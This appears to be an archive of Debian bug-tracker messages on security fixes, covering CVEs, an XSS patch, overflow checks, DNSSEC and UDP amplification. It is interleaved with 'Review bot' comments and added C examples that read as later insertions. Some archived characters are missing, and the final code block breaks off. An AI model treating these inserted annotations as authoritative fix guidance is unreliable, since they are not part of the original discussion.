Bug#773610: libapache2-svn: apache2 restart failed: mod_dav_svn.so: undefined symbol:, dav_svn__new_error

2014-12-20 Thread Florian Weimer
* Arne Nordmark:

> The wheezy-security upload breaks libapache2-svn in exactly the same
> way as the previous upload 1.6.17dfsg-4+deb7u5, which was fixed in
> 1.6.17dfsg-4+deb7u6, see bug number 741314 for more details.

Ugh, I'm building this now myself and will upload another version if
it passes basic testing.

(The build seems to disable all warnings, unfortunately.)





Bug#760377: confirm apache 1 and gpl-1+ situation

2014-11-10 Thread Florian Weimer
* Paul Gevers:

> [2]
> http://anonscm.debian.org/cgit/collab-maint/xmlrpc-c.git/tree/lib/util/getoptx.h?h=debian-sid

You should investigate if you can use the getopt from glibc, which is
released under the LGPL.

> [3]
> http://anonscm.debian.org/cgit/collab-maint/xmlrpc-c.git/tree/tools/turbocharger/mod_gzip.c?h=debian-sid

I don't think this file is even compiled, so its license does not
matter.





Bug#742140: libpam-oath: PAM module does not check whether strdup allocations succeeded

2014-11-06 Thread Florian Weimer
* Andreas Barth:

> we have the following debian bug report about a security issue in
> libpam-oath (source oath-toolkit, upstream web page
> http://www.nongnu.org/oath-toolkit/ ).
>
> What is the appropriate process to get a CVE number on it? This issue
> is already public, as it is documented in the debian bug tracking
> system.

Does this actually have any application impact?  Not checking for
error on malloc failure is extremely common, and many applications use
wrappers such as xmalloc which explicitly terminate the process on
malloc failure.





Bug#766397: Bug#766395: emacs/gnus: Uses s_client to for SSL.

2014-10-23 Thread Florian Weimer
* Richard Stallman:

> I've read that falling back to ssl3 is a real security hole,
> being exploited frequently.  That feature should be removed.

GNUTLS automatically and securely upgrades to a TLS protocol if
supported by the server.  Dropping SSL 3.0 support altogether will
only encourage unencrypted connections instead.  Furthermore, SSL 3.0
is certainly not an ideal design, but neither is TLS 1.0.  Only
TLS 1.1 and later attempt to fix the padding issue, and support for
those versions is still poor in servers.  Fortunately, the padding
issues are only exploitable under fairly narrow circumstances.
Most applications (except web browsers) use SSL 3.0 in such a way that
the attack described in the POODLE paper does not apply.





Bug#742145: openssl: uses only 32 bytes (256 bit) for key generation

2014-03-19 Thread Florian Weimer
* Thorsten Glaser:

>> Historically, the OpenSSL command line tools have been intended for
>> debugging only.
>
> I disagree,

It's what I was told by the OpenSSL developers.

> Also, what do other tools (that do not invoke openssl(1)
> unlike most of these I saw, which were shell wrappers
> around it) do, entropy-wise?

There are different choices.  Some use more bits from /dev/urandom,
some even block on /dev/random.  The latter is quite problematic for
non-interactive key generation during package installation.





Bug#734789: [CVE-2013-7284] Remote pre-authentication code execution in PlRPC

2014-01-09 Thread Florian Weimer
Package: libplrpc-perl
Severity: grave
Version: 0.2020-2
Tags: security upstream

The PlRPC module uses Storable in an unsafe way, leading to a remote
code execution vulnerability (in both the client and the server).

Upstream bug report:

https://rt.cpan.org/Public/Bug/Display.html?id=90474

A fix (which is not yet available) requires a protocol change.  I
think we should remove the package from the distribution instead.





Bug#731933: libmicrohttpd: CVE-2013-7038 CVE-2013-7039

2013-12-11 Thread Florian Weimer
* Moritz Muehlenhoff:

> Please see
> https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-7038
> https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-7039

When fixing this, please also include these two upstream commits.
Thanks.


r30927 | grothoff | 2013-11-28 11:05:52 +0100 (Thu, 28 Nov 2013) | 1 line

-handle case that original allocation request was zero

r30926 | grothoff | 2013-11-28 10:16:38 +0100 (Thu, 28 Nov 2013) | 1 line

-fix theoretical overflow issue reported by Florian Weimer





Bug#707410: NMU debdiff

2013-10-19 Thread Florian Weimer
I've NMU'ed these bugs, uploaded to DELAYED-5days.

diff -Nru mlton-20100608/debian/changelog mlton-20100608/debian/changelog
--- mlton-20100608/debian/changelog 2011-07-19 12:37:02.0 +0200
+++ mlton-20100608/debian/changelog 2013-10-19 19:45:37.0 +0200
@@ -1,3 +1,13 @@
+mlton (20100608-5.1) unstable; urgency=low
+
+  * Non-Maintainer Upload
+  * Apply upstream patch to avoid __gmp_const breakage
+(Closes: 707410)
+  * Apply patch from Matthias Klose to allow building on more target
+triplets on i386, not just i486-linux-gnu (Closes: 640137)
+
+ -- Florian Weimer f...@deneb.enyo.de  Sat, 19 Oct 2013 19:39:58 +0200
+
 mlton (20100608-5) unstable; urgency=low
 
   * Newest gcc and binutils fix mips[el] jump problem
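Review bot: the two bug references are written as `(Closes: 707410)` and `(Closes: 640137)` without the `#` that Debian changelogs conventionally use (`Closes: #707410`); dpkg treats the `#` as optional, but the conventional form matches the rest of the archive and is what people grep for. The 707410 entry would also be more useful to later readers if it named the cause the patch title gives (GMP dropping `__gmp_const`), e.g. "Apply upstream patch to replace __gmp_const with const, fixing the build against GMP >= 5.1".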
diff -Nru mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install 
mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install
--- mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install  2011-03-21 
19:55:23.0 +0100
+++ mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install  2013-10-19 
19:44:39.0 +0200
@@ -1 +1 @@
-usr/lib/mlton/targets/i486-linux-gnu/*
+usr/lib/mlton/targets/i*86-linux-gnu/*
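Review bot: the glob `i*86-linux-gnu` now also matches i586/i686 target directories, which is what the changelog says the Klose patch is for, but the binary package is still called mlton-runtime-i486-linux-gnu, so on those triplets the i486-named package now carries a differently named target directory. A short comment in the install file (or the changelog) stating that the package name is kept for compatibility while the target directory follows the build triplet would save the next maintainer from "fixing" the glob back.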
diff -Nru mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch 
mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch
--- mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch  
1970-01-01 01:00:00.0 +0100
+++ mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch  
2013-10-19 19:36:53.0 +0200
@@ -0,0 +1,55 @@
+From a658a1f4a76a01f568116598800f49b80cf8ee1a Mon Sep 17 00:00:00 2001
+From: David Larsen dcl9...@cs.rit.edu
+Date: Wed, 17 Apr 2013 15:28:24 -0400
+Subject: [PATCH] Replace '__gmp_const' with 'const'
+
+The __gmp_const macro was added to GMP as a workaround for C compilers
+which didn't support the const keyword.  GMP 5.1 removed support for
+pre-ANSI C compilers, so the __gmp_const workaround was removed at the
+same time.
+
+This change replaces all uses of '__gmp_const' with uses of the 'const'
+keword directly, since MLton already expects C99 support from the system
+C compiler.
+
+This should fix the build errors for systems using GMP = 5.1.
+---
+ runtime/gc/int-inf.c |8 
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/runtime/gc/int-inf.c b/runtime/gc/int-inf.c
+index 7f24e64..6a91390 100644
+--- a/runtime/gc/int-inf.c
 b/runtime/gc/int-inf.c
+@@ -181,8 +181,8 @@ objptr finiIntInfRes (GC_state s, __mpz_struct *res, 
size_t bytes) {
+ 
+ static inline objptr binary (objptr lhs, objptr rhs, size_t bytes,
+  void(*binop)(__mpz_struct *resmpz,
+-  __gmp_const __mpz_struct *lhsspace,
+-  __gmp_const __mpz_struct 
*rhsspace)) {
++  const __mpz_struct *lhsspace,
++  const __mpz_struct *rhsspace)) {
+   __mpz_struct lhsmpz, rhsmpz, resmpz;
+   mp_limb_t lhsspace[LIMBS_PER_OBJPTR + 1], rhsspace[LIMBS_PER_OBJPTR + 1];
+ 
+@@ -258,7 +258,7 @@ objptr IntInf_xorb (objptr lhs, objptr rhs, size_t bytes) {
+ 
+ static objptr unary (objptr arg, size_t bytes,
+  void(*unop)(__mpz_struct *resmpz,
+- __gmp_const __mpz_struct *argspace)) {
++ const __mpz_struct *argspace)) {
+   __mpz_struct argmpz, resmpz;
+  mp_limb_t argspace[LIMBS_PER_OBJPTR + 1];
+ 
+@@ -284,7 +284,7 @@ objptr IntInf_notb (objptr arg, size_t bytes) {
+ 
+ static objptr shary (objptr arg, Word32_t shift, size_t bytes,
+  void(*shop)(__mpz_struct *resmpz,
+- __gmp_const __mpz_struct *argspace,
++ const __mpz_struct *argspace,
+  unsigned long shift))
+ {
+   __mpz_struct argmpz, resmpz;
+-- 
+1.7.10.4
+
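Review bot: the commit message claims all uses of `__gmp_const` were replaced, but the diffstat only touches runtime/gc/int-inf.c; one remaining use anywhere else in the runtime would fail the build in exactly the same way, so a `grep -r __gmp_const` over the unpacked source before upload is worth the minute. The From/Date/Subject headers are accepted by DEP-3, but adding a `Bug-Debian: http://bugs.debian.org/707410` line (and `Origin: upstream` with the commit id) would tie the patch to this NMU.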
diff -Nru mlton-20100608/debian/patches/series 
mlton-20100608/debian/patches/series
--- mlton-20100608/debian/patches/series2011-07-19 13:54:28.0 
+0200
+++ mlton-20100608/debian/patches/series2013-10-19 19:37:48.0 
+0200
@@ -1,2 +1,3 @@
 11-fixes-20100608-to-20110319.patch
 22-fixes-20110319-to-20110719.patch
+Replace-__gmp_const-with-const.patch
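Review bot: the two existing series entries carry numeric prefixes (`11-`, `22-`) while the new one does not; naming it along the lines of `33-Replace-__gmp_const-with-const.patch` keeps the application order explicit if further patches are added later.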





Bug#709382: Built-Using, libgcc, and libc_nonshared

2013-06-02 Thread Florian Weimer
* Russ Allbery:

 Clearly no one else in the world is worrying about this; there's lots of
 GPLv2-only software out there and all the distributions are happily
 distributing binaries built with current GCC without worrying about this.
 I'm not sure to what extent we can use that as an excuse, though.

FYI, this is [gnu.org #435945], filed about three years ago.  I
haven't received any substantiated reaction from the FSF.

A similar thing must have happened during the transition from GPLv1 to
GPLv2 and would still apply to GPLv1 software.

Nowadays, we could switch to compiler-rt after porting it to more
architectures.  Or we could branch the old version of libgcc with the
permissive linking exception and maintain that, asking subsequent FSF
contributors to relicense their patches under the old terms (which
they can do under their copyright assignment contract with the FSF, I
think).





Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

2013-05-24 Thread Florian Weimer
* Steven Chamberlain:

 Hi,

 On 22/05/13 19:46, Florian Weimer wrote:
 Sorry for the delay.  I'm taking care of this now.

 Thank you for the DSA.

 I notice a problem though when this was (I think - I'm unsure of the
 security team's processes here) copied to the main archive, probably so
 that it can be included in stable-proposed-updates:

Thanks for noticing.

I don't see the package in the stable queue:

http://release.debian.org/proposed-updates/stable.html

And the dak mirror on ries.debian.org hasn't got it, either.

Could you contact ftpmaster and/or the stable release managers about
this?  I don't think we can do anything about it on the security side.





Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

2013-05-22 Thread Florian Weimer
* Steven Chamberlain:

 On 01/05/13 15:20, Christoph Egger wrote:
 Florian Weimer f...@deneb.enyo.de writes:
 Looks good.  Please upload to security-master directly.  You have to
 rebuild with -sa, though, so that the upstream tarball is included in
 the upload.
 
 Should be somewhere in your queue now

 Was the upload (src:kfreebsd-9) okay?  Do you need anything further from us?

Sorry for the delay.  I'm taking care of this now.





Bug#708267: cve-2002-2443: kpasswd udp ping-pong

2013-05-20 Thread Florian Weimer
* Tom Yu:

 Some limited testing indicates that when the packet storm is confined
 to a single host, legitimate kpasswd and kadm5 requests can still get
 through, and the CPU usage pegs at about 70%.  I haven't tested with
 multiple hosts involved.

Out of curiosity, how many spoofed packets have you injected?





Bug#708267: cve-2002-2443: kpasswd udp ping-pong

2013-05-20 Thread Florian Weimer
* Tom Yu:

 Florian Weimer f...@deneb.enyo.de writes:

 * Tom Yu:

 Some limited testing indicates that when the packet storm is confined
 to a single host, legitimate kpasswd and kadm5 requests can still get
 through, and the CPU usage pegs at about 70%.  I haven't tested with
 multiple hosts involved.

 Out of curiosity, how many spoofed packets have you injected?

 I only did some proof of concept testing with a single spoofed packet.

Okay, that explains the limited impact. 8-)





Bug#708267: cve-2002-2443: kpasswd udp ping-pong

2013-05-20 Thread Florian Weimer
* Sam Hartman:

 I assume this goes back to squeeze as well.

 Shouldn't the severity be higher? This seems probably worth a DSA
 because such ping-pong attacks can really be bad for a network/server.
 Or am I missing mitigations?

Yes, packet loops can be annoying.  I think we should issue a DSA for
this.

 I'd be happy to work on packages.

Thanks!





Bug#708267: cve-2002-2443: kpasswd udp ping-pong

2013-05-20 Thread Florian Weimer
* Sam Hartman:

 Florian == Florian Weimer f...@deneb.enyo.de writes:


 Florian Yes, packet loops can be annoying.  I think we should issue
 Florian a DSA for this.

 OK, do you want me to prepare patches and builds for squeeze and wheezy?

Yes, that would be ideal.





Bug#708291: libjansi-native-java: package appears to be unusable

2013-05-14 Thread Florian Weimer
Package: libjansi-native-java
Version: 1.0-3
Severity: grave

The package claims to provide JNI libraries, but is architecture: all.
For some reason, there are no DSOs in the JAR files.

I think as it stands, the package is completely usable.





Bug#708164: nginx proxy_pass buffer overflow (CVE-2013-2070)

2013-05-13 Thread Florian Weimer
* Thijs Kinkhorst:

 A buffer overflow in the proxy_pass module has been reported by
 Nginx upstream, and a patch made available. Please see:
 http://www.openwall.com/lists/oss-security/2013/05/13/3

 The issue is already fixed in the version in sid, and as far
 as I can see the code is not present in squeeze.

 Can you ensure that (a) the RC bug against nginx in sid is dealt with
 so the fixed package can migrate to jessie, and (b) prepare an update
 to wheezy?

Note that the upstream patch is not 100% correct C (the overflow check
can be optimized by the compiler).  Therefore, the generated assembly
has to be inspected to ensure that the check is actually in place.

Here's a bit of background information:

http://cert.uni-stuttgart.de/ticker/advisories/c-integer-overflow.html
https://www.securecoding.cert.org/confluence/display/seccode/INT32-C.+Ensure+that+operations+on+signed+integers+do+not+result+in+overflow
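The distinction the message draws is between an overflow check written on the result of the operation and one written on the operands. The following is an added example, not nginx's code and not the upstream patch; the function names are made up. It puts the unreliable form next to the form that cannot be optimised away, and applies the same rule to the unsigned size arithmetic that typically feeds a buffer allocation.

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The tempting form: add first, then look at whether the sum "wrapped".
 * Signed overflow is undefined behaviour in C, so a compiler is entitled to
 * assume `a + b` did not overflow and delete both comparisons.  Whether the
 * check survives depends on compiler and flags, which is exactly why the
 * generated assembly had to be inspected.  Shown only for contrast. */
bool add_fits_unreliable(int a, int b)
{
    int sum = a + b;                       /* undefined if it overflows */
    if (b > 0 && sum < a) return false;    /* may be optimised away */
    if (b < 0 && sum > a) return false;    /* may be optimised away */
    return true;
}

/* The reliable form: compare the operands against the limits before adding.
 * No expression here can overflow, so there is nothing for the optimiser to
 * reason away. */
bool add_fits(int a, int b)
{
    if (b > 0) return a <= INT_MAX - b;
    return a >= INT_MIN - b;               /* covers b == 0 as well */
}

/* Same principle for unsigned size arithmetic: wraparound is well defined
 * for size_t, but the check still belongs before the multiply so that a
 * wrapped product is never used. */
bool mul_fits_size(size_t a, size_t b)
{
    return b == 0 || a <= SIZE_MAX / b;
}

/* header + count * elem_size, or 0 when the result does not fit in size_t.
 * Callers treat 0 as "refuse the request" rather than as a small buffer. */
size_t checked_buffer_len(size_t header, size_t count, size_t elem_size)
{
    if (!mul_fits_size(count, elem_size)) return 0;
    size_t body = count * elem_size;
    if (body > SIZE_MAX - header) return 0;
    return header + body;
}

int main(void)
{
    printf("add_fits(INT_MAX, 1) = %d\n", add_fits(INT_MAX, 1));          /* 0 */
    printf("add_fits(INT_MIN, 1) = %d\n", add_fits(INT_MIN, 1));          /* 1 */
    printf("checked_buffer_len(16, 8, 4) = %zu\n",
           checked_buffer_len(16, 8, 4));                                 /* 48 */
    printf("checked_buffer_len(1, SIZE_MAX, 1) = %zu\n",
           checked_buffer_len(1, SIZE_MAX, 1));                           /* 0 */
    return 0;
}
```

The practical test for any such check is the one the message names: if the check reads the value it is supposed to protect, it is written on the wrong side of the operation.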





Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

2013-05-01 Thread Florian Weimer
* Christoph Egger:

 Hi!

 Steven Chamberlain ste...@pyro.eu.org writes:
 tags 706414 + pending
 thanks

 I've applied upstream's patch in SVN, I'm running it now on my NFS
 server and seems okay.

 Christoph, would you be able to do an upload of this to unstable please?

 I'm building right now. As it is too late for wheezy r0 it seems we'll
 need to go through either security or stable-updates for wheezy
 (security Cc-ed and patch attached to get that going).

Thanks.  Can you send a debdiff for an upload targeted at
wheezy-security, and prepare packages (which have to be built
with -sa)?





Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

2013-05-01 Thread Florian Weimer
* Christoph Egger:

 Packages will be in people.d.o:~christoph soon (or shall I upload to
 security directly?

Looks good.  Please upload to security-master directly.  You have to
rebuild with -sa, though, so that the upstream tarball is included in
the upload.





Bug#690817: Is that bug still open?

2012-11-04 Thread Florian Weimer
* Ingo Jürgensmann:

 I'm fine with that, but unfortunately you didn't answer my question
 regarding the prominent warning about security issues that is still
 left open and visible to the end user. Please see the attached
 screenshots.

This appears to be a different bug.  Apparently, Drupal phones home.
We generally patch out such functionality.





Bug#691394: opendkim: DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust

2012-10-25 Thread Florian Weimer
* Scott Kitterman:

 This is not something that can be dealt with operationally.  Unlike
 GPG, where keys are trusted based on signatures and web of trust
 (and people can decline to sign bad keys), in DKIM keys are trusted
 based on their being published in the sending domain's DNS and there
 is no human in the loop.

I still don't see how this is different from the OpenPGP situation.

Assuming that DNS is secure enough, if the sender doesn't publish a
short key, it's not possible to use one.  There is also no certificate
chaining which could result in an unknown set of potentially
problematic certificates.  It really boils down to using DKIM
correctly.

Rejecting short keys still has value because without such drastic
measures, insecure cryptography works as well as secure cryptography,
but I don't think this warrants a security update.





Bug#689755: bind9: memory hole in named

2012-10-09 Thread Florian Weimer
* Christoph Anton Mitterer:

 On Mon, 2012-10-08 at 07:14 +0200, Florian Weimer wrote:
 Have you configured a memory limit for the cache?
 Which would you mean max-cache-size or max-acache-size?

Not sure.  I think in my days, there was max-cache-size only.

 Well I think that's a design bug then in bind, ... cause it can’t just
 grow and grow... and then die when it runs out of memory.

Please try again with max-cache-size.  It's still possible that you
run into a genuine memory leak.





Bug#689755: bind9: memory hole in named

2012-10-07 Thread Florian Weimer
retitle 689755 bind9: memory leak in named
thanks

* Christoph Anton Mitterer:

 Since some update (unfortunately I forgot which one,.. but it's at
 least months ago) I experience a memory hole in named.

Have you configured a memory limit for the cache?  By default, there
is no limit, and records are only removed from the resolver cache when
they expire.





Bug#682826: world writable directories possible patch

2012-09-01 Thread Florian Weimer
 Using chmod 1777 could help?

 I attached a patch just in case it does.

Not really, I think.  Users cannot build .fasl files for other users
because they could supply crafted ones which do something different
from what the original Lisp sources do.





Bug#682826: world writable directories possible patch

2012-09-01 Thread Florian Weimer
* Barak A. Pearlmutter:

  - have a setuid program that builds fasl files from trusted sources,
which in practice means download them itself or from .deb packages

Or a daemon, given that it's difficult to write SUID programs in Lisp.
I thought we had common-lisp-controller for that?





Bug#679828: libc6: No easy way of enabling DNSSEC validation aka RES_USE_DNSSEC

2012-07-02 Thread Florian Weimer
* Matthew Grant:

 From my investigations this can only be enabled by recompiling each bit
 of software to set the RES_USE_DNSSEC flag in _res.options, as well as
 RES_USE_EDNS0. (Please see racoon bug #679483).  The enablement method
 is from openssh 6.0p1, openbsd-compat/getrrsetbyname.c 

This does not actually activate DNSSEC, it just tells the recursive
resolver that the application is able to process DNSSEC records.  The
application would still have to validate them.

Applications should never need to set the RES_USE_DNSSEC flag because
it does not make sense to treat DNSSEC-signed data differently from
unsigned data.

 Please create a resolv.conf flag so that RES_USE_DNSSEC is available
 to the systems administrator, and maybe a debconf screen to select it.

This alone wouldn't make any difference to the spoofing problem.

libc is not the correct place to put DNSSEC validation because many
processes are short-lived and would have to fetch all key material and
signatures from DNS, beginning at the root.  This would turn a single
name resolution into six or more DNS queries, which is excessive.

At this stage, you should run a BIND or Unbound process restricted to
localhost which performs the validation.  This validation will happen
even for applications which do not set the RES_USE_DNSSEC flag.
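Added example, not from glibc or from any package in this bug, separating the two things the message distinguishes: setting RES_USE_DNSSEC, which only asks the recursive resolver to include DNSSEC records, and deciding whether an answer was validated, which an application can only do by trusting the AD bit of a validating resolver it controls (here: one bound to localhost, as the message suggests). All function names are made up and the sample response headers are constructed.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <resolv.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What RES_USE_DNSSEC does and nothing more: with RES_USE_EDNS0 it makes
 * libresolv send an OPT record with the DO bit, so the recursive resolver
 * returns RRSIG records.  No signature is checked in this process.
 * The caller is assumed to have initialised st with res_ninit(). */
void request_dnssec_records(struct __res_state *st)
{
    st->options |= RES_USE_EDNS0 | RES_USE_DNSSEC;
}

/* Fourth header byte of a DNS message: RA=0x80 Z=0x40 AD=0x20 CD=0x10 and the
 * low nibble is RCODE.  Returns 1 if AD (Authenticated Data) is set, 0 if it
 * is clear, -1 if the buffer is shorter than a header. */
int response_has_ad(const uint8_t *msg, size_t len)
{
    if (len < 12) return -1;
    return (msg[3] & 0x20) ? 1 : 0;
}

/* Whether the server address the answer came from is this host: 127/8 or ::1. */
int resolver_is_local(const char *ip)
{
    struct in_addr a4;
    struct in6_addr a6;
    if (inet_pton(AF_INET, ip, &a4) == 1)
        return (ntohl(a4.s_addr) >> 24) == 127;
    if (inet_pton(AF_INET6, ip, &a6) == 1)
        return IN6_IS_ADDR_LOOPBACK(&a6) ? 1 : 0;
    return 0;
}

/* The decision an application should make instead of setting flags: an answer
 * counts as validated only if AD is set AND it came from a validating resolver
 * on localhost.  An AD bit from an off-host server travelled over the same
 * spoofable UDP path as the rest of the answer. */
int answer_validated(const uint8_t *msg, size_t len, const char *server_ip)
{
    return response_has_ad(msg, len) == 1 && resolver_is_local(server_ip);
}

/* Constructed sample headers: ID 0x1234, flags QR|RD, RA|AD (0x81 0xa0) versus
 * QR|RD, RA only (0x81 0x80), one question, one answer, one additional. */
static const uint8_t HDR_AD[12]   = {0x12, 0x34, 0x81, 0xa0, 0, 1, 0, 1, 0, 0, 0, 1};
static const uint8_t HDR_NOAD[12] = {0x12, 0x34, 0x81, 0x80, 0, 1, 0, 1, 0, 0, 0, 1};

/* Shows that the flag only changes what is requested; returns 1 when both
 * option bits are set on a zeroed state. */
int dnssec_flags_set_demo(void)
{
    struct __res_state st;
    memset(&st, 0, sizeof st);
    request_dnssec_records(&st);
    return (st.options & RES_USE_DNSSEC) && (st.options & RES_USE_EDNS0) ? 1 : 0;
}

int main(void)
{
    printf("AD from 127.0.0.1: %d\n", answer_validated(HDR_AD, 12, "127.0.0.1"));   /* 1 */
    printf("AD from 8.8.8.8:   %d\n", answer_validated(HDR_AD, 12, "8.8.8.8"));     /* 0 */
    printf("no AD, local:      %d\n", answer_validated(HDR_NOAD, 12, "127.0.0.1")); /* 0 */
    return 0;
}
```

In practice the server address comes from the resolver configuration (the nameserver entries in resolv.conf), so the policy reduces to: configure only the local validating BIND or Unbound instance there, and treat AD as meaningful only under that configuration.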






Bug#679272: bcfg2-server: unescaped shell command issues in the Trigger plugin

2012-06-27 Thread Florian Weimer
* Arto Jantunen:

 In Debian (and all other distros I know of) the bcfg2 server runs as
 root, so in practice this is a remote root hole (limited to attackers
 who can connect to the bcfg2 server (protected by a password and/or an
 ssl key)).

 .dsc and .debian.tar.gz for a fixed package are attached. I'll upload
 the fix to unstable next.

There's a spurious diff in the changelog:

 bcfg2 (1.0.1-3+squeeze1) stable-security; urgency=high
 
   * Apply patch from Chris St. Pierre to fix several problems with
-unescaped shell commands (Closes: #640028).
+unescaped shell commands
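Review bot: the `+` line drops `(Closes: #640028)` and the trailing full stop from the changelog entry, so the stable-security upload will no longer close that bug in the BTS when it is accepted; restore the original line so the only changes in the debdiff are the intended ones.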

But the actual patch seems fine.  Please build without -sa and upload
to security-master.  Thanks!






Bug#658276: libcurl3: Doesn't work for all sites anymore

2012-03-31 Thread Florian Weimer
* Alessandro Ghedini:

 Anyway, you can upload to security-master when ready.  You must build
 the package with specifying the -sa flag, on a squeeze system.

 Ok, thank you.

Thanks for uploading.  I'm a bit confused--is this an interoperability
issue introduced by DSA-2398-1?






Bug#658276: libcurl3: Doesn't work for all sites anymore

2012-03-28 Thread Florian Weimer
* Alessandro Ghedini:

 We should fix this through stable-security. Please send a debdiff once
 the fix has been testing in unstable for a few days.

 Attached is the debdiff for stable-security.

Looks good.

 If everything's ok I will upload it (I'm a DD since a few hours) in
 a few days, once the sid version has been tested more.

Do you really think this option will actually be used in practice,
except if there's a failure?

Anyway, you can upload to security-master when ready.  You must build
the package with specifying the -sa flag, on a squeeze system.






Bug#665656: openarena-server: is vulnerable for getstatus DRDoS attack

2012-03-25 Thread Florian Weimer
* Simon McVittie:

 Dear security team: what do you consider the severity of this bug to be?
 Is it the sort of thing you issue DSAs for?

So the problem seems to be traffic amplification by a factor of 250.
(around 2000 bytes in, 500,000 bytes out).  Is this correct?

Is there any experience which strongly suggests that deploying the
patch actually helps victims?  Then we should issue a DSA.






Bug#665656: openarena-server: is vulnerable for getstatus DRDoS attack

2012-03-25 Thread Florian Weimer
* Simon McVittie:

 Some proposed updates using the patch from ioquake3 are in my home
 directory on alioth:
 http://alioth.debian.org/~smcv/. Patch for review:
 http://anonscm.debian.org/gitweb/?p=pkg-games/openarena.git;a=commitdiff;h=caeb284533211bb0f76872279106a49306290168

Thanks for working on this.

Please set the distribution to squeeze-security, adjust the version
number, build with -sa, and upload to security-master.






Bug#661150: dropbear: CVE-2012-0920 SSH server use-after-free vulnerability]

2012-02-28 Thread Florian Weimer
* Gerrit Pape:

 For stable, I backported the fix to 0.52, swiftly checked with upstream
 (thx Matt), and prepared these changes (debdiff attached):

Thanks.  Please build with -sa and upload to security-master.






Bug#659899: CVE-2011-0790: XSS

2012-02-27 Thread Florian Weimer
* Antoine Beaupré:

 ++   $h =~ s/[%]/./g;

 ++$step =~ s/[%]/./g; 

 ++$mode =~ s/[%]/./g;

 ++$t =~ s/[%]/./g; 

 ++$targ =~ s/[;%]/./g;

 ++$hierarchy =~ s/[;%]/./g;
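Review bot: the character classes `[%]` and `[;%]` only turn percent signs and semicolons into dots, so the quote and angle-bracket characters that terminate an HTML attribute or tag pass through unchanged, and a value interpolated as `target=$t` can still close the attribute and add further ones. Removing individual characters is the wrong shape for an XSS fix: HTML-escape `$h`, `$step`, `$mode`, `$t`, `$targ` and `$hierarchy` at the point where they are written into the page (for instance with `encode_entities` from HTML::Entities) so that every metacharacter is covered, and keep the `%` filtering only if it serves a separate purpose.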

These patterns do not match the special character .  Therefore, it is
still possible to escape from the target=$t parameter (for example)
and inject an onmouseover handler.

I would prefer if this could be fixed.  Has upstream already released
this patch as a security update?






Bug#661509: security.debian.org: Packages-file for squeeze-amd64 broken

2012-02-27 Thread Florian Weimer
* Tim Riemenschneider:

 security.debian.org is currently unusable (for amd64 squeeze)

I cannot reproduce this (at 20:17 CET).  What does currently mean,
exactly?






Bug#659899: CVE-2011-0790: XSS

2012-02-27 Thread Florian Weimer
* Antoine Beaupré:

 I don't actually know - I followed your lead and used that patch in the
 bugzilla Redhat bugtrackers:

 https://bugzilla.redhat.com/attachment.cgi?id=556619action=diffcontext=patchcollapsed=headers=1format=raw

Okay, I'm notifying folks that this patch is probably not correct.
In the meantime, could you prepare an update which also strips the
 character (and = as well, just to be sure).  Let's hope that this
doesn't break any functionality.






Bug#659899: CVE-2011-0790: XSS

2012-02-27 Thread Florian Weimer
* Antoine Beaupré:

 I don't actually know - I followed your lead and used that patch in the
 bugzilla Redhat bugtrackers:

 https://bugzilla.redhat.com/attachment.cgi?id=556619action=diffcontext=patchcollapsed=headers=1format=raw

*grml*

Fedora has already released the potentially incorrect patch.  I've
asked on the oss-security mailing list.  Sorry for the delay.






Bug#659296: Comments on the 0.4.1-6 upload

2012-02-13 Thread Florian Weimer
Vasudev Kamath asked me to include this information in the bug report.

From: Florian Weimer f...@deneb.enyo.de
Subject: Re: Accepted surf 0.4.1-6 (source i386)
To: Vasudev Kamath kamathvasu...@gmail.com
Date: Fri, 10 Feb 2012 23:18:36 +0100
Message-ID: 87vcnemiwz@mid.deneb.enyo.de

* Vasudev Kamath:

  surf (0.4.1-6) unstable; urgency=high
  .
* QA upload.
* debian/patches:
  + Added fix-insecure-permissions.patch to fix world readable cookie jar
vulnerability CVE-2012-0842. (Closes: #659296)

-   g_mkdir_with_parents(apath, 0755);
+   g_mkdir_with_parents(apath, 0700);
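Review bot: the mode argument only takes effect when g_mkdir_with_parents creates the directory; a cookie directory that an earlier version already created as 0755 keeps its permissions across the upgrade, and the requested mode is additionally masked by the process umask. Follow the call with an explicit chmod to 0700 on the path (the final component is enough to keep the contents private) so existing installations are covered as well as fresh ones.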

I think you should also downgrade the permissions from 0755 if the
directory exists (in case we want to keep the package alive, which I doubt).

[Addendum: It is sufficient to do this with just one component of the
path.]
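Added example, not surf's code, of what the comment above asks for: create the directory with mode 0700 and also tighten it when it already exists, since the mode passed to mkdir only applies to a directory created by that call and is masked by the umask. Only the final path component is handled, as the addendum says is sufficient. Function names are made up and the scratch path used by the self-check is constructed.

```c
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Make `path` a directory that only the calling user can read, creating it
 * if necessary.  Returns 0 on success, -1 with errno set on failure.
 * The explicit chmod is the part the one-line mode change lacks: it covers
 * a directory created 0755 by an older version and a restrictive umask. */
int ensure_private_dir(const char *path)
{
    struct stat st;

    if (mkdir(path, 0700) != 0 && errno != EEXIST)
        return -1;
    /* lstat, so that a symlink planted at this path is noticed, not followed */
    if (lstat(path, &st) != 0)
        return -1;
    if (!S_ISDIR(st.st_mode)) {
        errno = ENOTDIR;
        return -1;
    }
    /* Refuse to adopt a directory owned by someone else, such as a pre-created
     * one in a shared location. */
    if (st.st_uid != geteuid()) {
        errno = EPERM;
        return -1;
    }
    if ((st.st_mode & 07777) != 0700 && chmod(path, 0700) != 0)
        return -1;
    return 0;
}

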